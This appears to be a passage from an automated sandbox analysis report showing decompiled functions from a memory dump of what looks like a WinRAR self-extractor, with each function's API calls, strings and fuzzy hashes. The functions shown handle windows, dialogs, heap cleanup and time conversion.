Function 001A8FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E001A8FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E001A8D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L001B2B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E001B668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x1cdf88(0,  *0x1cdfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x1cdf90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x1cdf98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x1cdfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x1cdf8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E001A8E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L001B2B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x001a8fef
0x001a8ff3
0x001a8ff9
0x001a8ffc
0x001a8fff
0x001a900b
0x001a9014
0x001a9019
0x001a901e
0x001a9024
0x001a902a
0x001a902e
0x001a9026
0x001a9026
0x001a9026
0x001a9034
0x001a903b
0x001a9044
0x001a905b
0x001a9065
0x001a906a
0x001a906a
0x001a9070
0x001a907e
0x001a90ab
0x001a90b1
0x001a90b8
0x001a90f2
0x001a90f4
0x001a90f9
0x00000000
0x001a9102
0x001a90ba
0x001a90bc
0x001a90c3
0x001a90c6
0x001a90cd
0x001a90d2
0x001a90d6
0x001a90db
0x001a90e3
0x00000000
0x001a90ef
0x001a90d6
0x001a90c6
0x001a90bc
0x001a910e

APIs

ShowWindow.USER32(?,00000000), ref: 001A8FFF
GetWindowRect.USER32(?,00000000), ref: 001A9044
ShowWindow.USER32(?,00000005,00000000), ref: 001A90DB
SetWindowTextW.USER32(?,00000000), ref: 001A90E3
ShowWindow.USER32(00000000,00000005), ref: 001A90F9

Strings

RarHtmlClassName, xrefs: 001A90A5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 603318e0f62a723c8a832a6d673e02bd75a4c7cb09c3ed9d2be903c879d8e250
Instruction ID: dd1c84765059df3351f47ab8c144b5edc79b73a4c34480b9326dc85fa362698c
Opcode Fuzzy Hash: 603318e0f62a723c8a832a6d673e02bd75a4c7cb09c3ed9d2be903c879d8e250
Instruction Fuzzy Hash: D931CD35104314AFCB219F64AC48F9BBFA8FF49761F004569F94AAA4A2CB31D881CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001BB506, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BB506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E001BB4CA(_t45, 7);
					E001BB4CA(_t45 + 0x1c, 7);
					E001BB4CA(_t45 + 0x38, 0xc);
					E001BB4CA(_t45 + 0x68, 0xc);
					E001BB4CA(_t45 + 0x98, 2);
					E001B7A50( *((intOrPtr*)(_t45 + 0xa0)));
					E001B7A50( *((intOrPtr*)(_t45 + 0xa4)));
					E001B7A50( *((intOrPtr*)(_t45 + 0xa8)));
					E001BB4CA(_t45 + 0xb4, 7);
					E001BB4CA(_t45 + 0xd0, 7);
					E001BB4CA(_t45 + 0xec, 0xc);
					E001BB4CA(_t45 + 0x11c, 0xc);
					E001BB4CA(_t45 + 0x14c, 2);
					E001B7A50( *((intOrPtr*)(_t45 + 0x154)));
					E001B7A50( *((intOrPtr*)(_t45 + 0x158)));
					E001B7A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E001B7A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x001bb50c
0x001bb511
0x001bb51a
0x001bb525
0x001bb530
0x001bb53b
0x001bb549
0x001bb554
0x001bb55f
0x001bb56a
0x001bb578
0x001bb586
0x001bb597
0x001bb5a5
0x001bb5b3
0x001bb5be
0x001bb5c9
0x001bb5d4
0x00000000
0x001bb5e4
0x001bb5e9

APIs

Part of subcall function 001BB4CA: _free.LIBCMT ref: 001BB4F3

_free.LIBCMT ref: 001BB554

Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78

_free.LIBCMT ref: 001BB55F
_free.LIBCMT ref: 001BB56A
_free.LIBCMT ref: 001BB5BE
_free.LIBCMT ref: 001BB5C9
_free.LIBCMT ref: 001BB5D4
_free.LIBCMT ref: 001BB5DF

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
Instruction ID: 42e77a36b4e25560d73a7a3b2dab7b4044e9e55fd76e4f596ac158a2c7e35d9b
Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
Instruction Fuzzy Hash: 9011FC72548B04AAD660B7B0CC8AFCF77DC6F54B00F444815F79F76493DBA9B6088660

Uniqueness

Uniqueness Score: -1.00%

Function 001B1694, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E001B1694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x1cd680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E001B288E(__eflags,  *0x1cd680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E001B28C8(__eflags,  *0x1cd680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E001B7B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E001B28C8(__eflags,  *0x1cd680, 0);
								} else {
									__eflags = E001B28C8(__eflags,  *0x1cd680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E001B7A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x001b169b
0x001b16ae
0x001b16b5
0x001b16b8
0x001b16bb
0x001b16d4
0x001b16d4
0x001b16bd
0x001b16bd
0x001b16bf
0x001b16c9
0x001b16cf
0x001b16d0
0x001b16d2
0x001b16e2
0x001b16e6
0x001b16e8
0x001b16fc
0x001b16fc
0x001b1705
0x001b16ea
0x001b16f8
0x001b16fa
0x001b170e
0x001b1710
0x001b1710
0x00000000
0x00000000
0x00000000
0x001b16fa
0x001b1713
0x00000000
0x00000000
0x00000000
0x001b16d2
0x001b16bf
0x001b171b
0x001b1725
0x001b169d
0x001b169f
0x001b169f

APIs

GetLastError.KERNEL32(?,?,001B168B,001AF0E2), ref: 001B16A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B16B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B16C9
SetLastError.KERNEL32(00000000,?,001B168B,001AF0E2), ref: 001B171B

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1186e7154e1f004ec6fbce2f86055a49711e6ac1a108e36eac9f173aa3eaa898
Instruction ID: 1625f1f1b23fb599237d2f218607139491309abbc7dc4dbfb79d844b030f6bc9
Opcode Fuzzy Hash: 1186e7154e1f004ec6fbce2f86055a49711e6ac1a108e36eac9f173aa3eaa898
Instruction Fuzzy Hash: 8E012B722093217FA7252B757C96DE73F88EB217717B2063AF114564E2EFA18C50D254

Uniqueness

Uniqueness Score: -1.00%

Function 001AD27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001AD27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x1efe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x1efe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x1efe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x001ad27b
0x001ad286
0x001ad28e
0x001ad2a0
0x001ad2a4
0x001ad2b0
0x001ad2b8
0x00000000
0x001ad2ba
0x001ad2c0
0x001ad2c5
0x001ad2cd
0x00000000
0x001ad2cf
0x001ad2cf
0x001ad2cf
0x001ad2cd
0x001ad2a6
0x001ad2a6
0x001ad2a6
0x001ad2a6
0x001ad2dd
0x001ad2e3
0x001ad2eb
0x001ad2f1
0x00000000
0x00000000
0x00000000
0x001ad2ed
0x001ad2ed
0x001ad2ed
0x001ad2ed
0x001ad2f5
0x001ad290
0x001ad293
0x001ad293
0x001ad288
0x001ad28b
0x001ad28b

Strings

ReleaseSRWLockExclusive, xrefs: 001AD2BA
KERNEL32.DLL, xrefs: 001AD295
AcquireSRWLockExclusive, xrefs: 001AD2AA

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 20619957e4e6a5b1db5a677108ddb8282ba1d6a9e7b81d4a49300212281b64ab
Instruction ID: f7d488e33d2f757c44c50fe933e5a96113ee9479b5c70a0c4f16f0f1bafbee31
Opcode Fuzzy Hash: 20619957e4e6a5b1db5a677108ddb8282ba1d6a9e7b81d4a49300212281b64ab
Instruction Fuzzy Hash: FD01447A640BA24B4F301FF43CA4BAB2B949B13B06312003FF842D3E10E760D882D790

Uniqueness

Uniqueness Score: -1.00%

Function 001A0910, Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E001A0910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0019A995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E001ADDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x001a0910
0x001a0914
0x001a0923
0x001a0925
0x001a092e
0x001a0937
0x001a0940
0x001a0949
0x001a0952
0x001a0959
0x001a095e
0x001a0972
0x001a0a0e
0x001a0a10
0x001a0978
0x001a0984
0x001a09aa
0x001a09bb
0x001a09cb
0x001a09d7
0x001a09df
0x001a09e5
0x001a09ed
0x001a09f3
0x001a09f5
0x001a09f9
0x001a0986
0x001a0990
0x001a0996
0x001a099a
0x001a099a
0x001a0a05
0x001a0a07
0x001a0a07
0x001a0a13
0x001a0a16
0x001a0a18
0x001a0a22

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 001A096E

Part of subcall function 0019A995: GetVersionExW.KERNEL32(?), ref: 0019A9BA

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A0990
FileTimeToSystemTime.KERNEL32(?,?), ref: 001A09AA
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001A09BB
SystemTimeToFileTime.KERNEL32(?,?), ref: 001A09CB
SystemTimeToFileTime.KERNEL32(?,?), ref: 001A09D7

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: e2464f1ddb08fa5ec7259ae04265b553a85f5e506937105337574f9fa6809828
Instruction ID: 361081953bbc81c7d050645d0b353979780455e0c7f0a684c250d59097cbe486
Opcode Fuzzy Hash: e2464f1ddb08fa5ec7259ae04265b553a85f5e506937105337574f9fa6809828
Instruction Fuzzy Hash: A131C27A1083469BC704DFA9C880DABB7E8BF98704F04491EF999C3210E734D549CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 001A8BE2, Relevance: 9.1, APIs: 6, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E001A8BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E001AF3CA(_a8, 0x1c40bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E001AF3CA(_t32, 0x1c40fc, _t25) != 0) {
						if(E001AF3CA(_t32, 0x1c40dc, _t25) != 0) {
							if(E001AF3CA(_t32, 0x1c40ac, _t25) != 0) {
								if(E001AF3CA(_t32, 0x1c414c, _t25) != 0) {
									if(E001AF3CA(_t32, 0x1c409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x001a8be6
0x001a8beb
0x001a8bf9
0x001a8bfe
0x001a8c10
0x001a8c9f
0x001a8c9f
0x001a8ca2
0x001a8ca4
0x001a8ca7
0x001a8caa
0x001a8cb6
0x00000000
0x001a8cb7
0x001a8c27
0x001a8c42
0x001a8c5d
0x001a8c78
0x001a8c9d
0x001a8cae
0x001a8cb1
0x00000000
0x001a8cb1
0x00000000
0x001a8c9d
0x001a8c7a
0x001a8c7d
0x001a8c80
0x001a8c84
0x001a8c88
0x00000000
0x001a8c88
0x001a8c5f
0x001a8c62
0x00000000
0x001a8c62
0x001a8c44
0x001a8c47
0x00000000
0x001a8c47
0x001a8c29
0x001a8c2c
0x00000000
0x001a8c2c
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 001A8C06
_memcmp.LIBVCRUNTIME ref: 001A8C1D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d80cb04d8242f098c8c657c681107f13a381cf80cf5bc47a21309486b6dfce5b
Instruction ID: d59b43435420b61cf164992c1ff60c541033ca8a89a2cf83eb799160a52c2060
Opcode Fuzzy Hash: d80cb04d8242f098c8c657c681107f13a381cf80cf5bc47a21309486b6dfce5b
Instruction Fuzzy Hash: AF210D7564410AABDB145A11CC81FBBB3ACAF62764F04413DFC0497105F730ED469BB1

Uniqueness

Uniqueness Score: -1.00%

Function 001B8516, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001B8516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x1cd6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E001B7B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E001B9BA9(_t25, _t36, __eflags,  *0x1cd6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E001B8388(_t25, _t31, 0x1f0418);
							E001B7A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E001B7A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E001B7AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x1cd6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E001B7B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E001B9BA9(_t27, _t37, __eflags,  *0x1cd6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E001B8388(_t27, _t32, 0x1f0418);
									E001B7A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E001B7A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E001B9B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E001B9B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x001b8516
0x001b8516
0x001b8516
0x001b8520
0x001b8522
0x001b8527
0x001b852a
0x001b8538
0x001b853f
0x001b8544
0x001b8547
0x001b854a
0x001b855c
0x001b8561
0x001b8563
0x001b856e
0x001b8575
0x001b857a
0x001b857d
0x001b857f
0x00000000
0x00000000
0x00000000
0x00000000
0x001b8565
0x001b8565
0x00000000
0x001b8565
0x001b854c
0x001b854c
0x001b854d
0x001b854d
0x001b8552
0x001b858d
0x001b858e
0x001b8594
0x001b8599
0x001b859c
0x001b859d
0x001b859e
0x001b85a5
0x001b85a7
0x001b85a9
0x001b85ae
0x001b85b1
0x001b85bf
0x001b85cb
0x001b85ce
0x001b85d1
0x001b85e3
0x001b85e8
0x001b85ea
0x001b85f5
0x001b85fb
0x001b8603
0x001b8605
0x00000000
0x00000000
0x00000000
0x00000000
0x001b85ec
0x001b85ec
0x00000000
0x001b85ec
0x001b85d3
0x001b85d3
0x001b85d4
0x001b85d4
0x001b8607
0x001b8608
0x001b8608
0x001b85b3
0x001b85b9
0x001b85bd
0x001b8610
0x001b8611
0x001b8617
0x00000000
0x00000000
0x00000000
0x001b85bd
0x001b861e
0x001b861e
0x001b852c
0x001b8532
0x001b8536
0x001b8581
0x001b8582
0x001b858c
0x00000000
0x00000000
0x00000000
0x001b8536

APIs

GetLastError.KERNEL32(?,001D00E0,001B3394,001D00E0,?,?,001B2E0F,?,?,001D00E0), ref: 001B851A
_free.LIBCMT ref: 001B854D
_free.LIBCMT ref: 001B8575
SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8582
SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B858E
_abort.LIBCMT ref: 001B8594

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 43ae47a42be7982fd17b152471535e127e5f5033eebb9394b887aac6066efa0c
Instruction ID: e5b2684c1e183bf758b71bd7ad60c194078b4e3c118f53a4afe383e3e2adf5a2
Opcode Fuzzy Hash: 43ae47a42be7982fd17b152471535e127e5f5033eebb9394b887aac6066efa0c
Instruction Fuzzy Hash: CDF0C87624460067D32633397C0AFEF265D9BE1F61B290125F519A31D1EF74CA42C161

Uniqueness

Uniqueness Score: -1.00%

Function 001AC2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001AC2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E001912D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0x1ede34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0x1ede34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0x1ede34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x001ac2a8
0x001ac2ad
0x001ac2b2
0x001ac2b7
0x001ac2cf
0x001ac32f
0x00000000
0x001ac331
0x001ac2d1
0x001ac2d7
0x001ac31c
0x001ac322
0x001ac32d
0x00000000
0x001ac32d
0x001ac2dc
0x001ac2eb
0x00000000
0x001ac2eb
0x001ac2e1
0x001ac2e4
0x001ac308
0x001ac30e
0x001ac2f1
0x001ac2f2
0x00000000
0x001ac2f2
0x001ac2e9
0x001ac2ef
0x00000000
0x001ac2ef
0x00000000

APIs

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

EndDialog.USER32(?,00000001), ref: 001AC2F2
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001AC308
SetDlgItemTextW.USER32(?,00000066,?), ref: 001AC322
SetDlgItemTextW.USER32(?,00000068), ref: 001AC32D

Strings

RENAMEDLG, xrefs: 001AC2BF

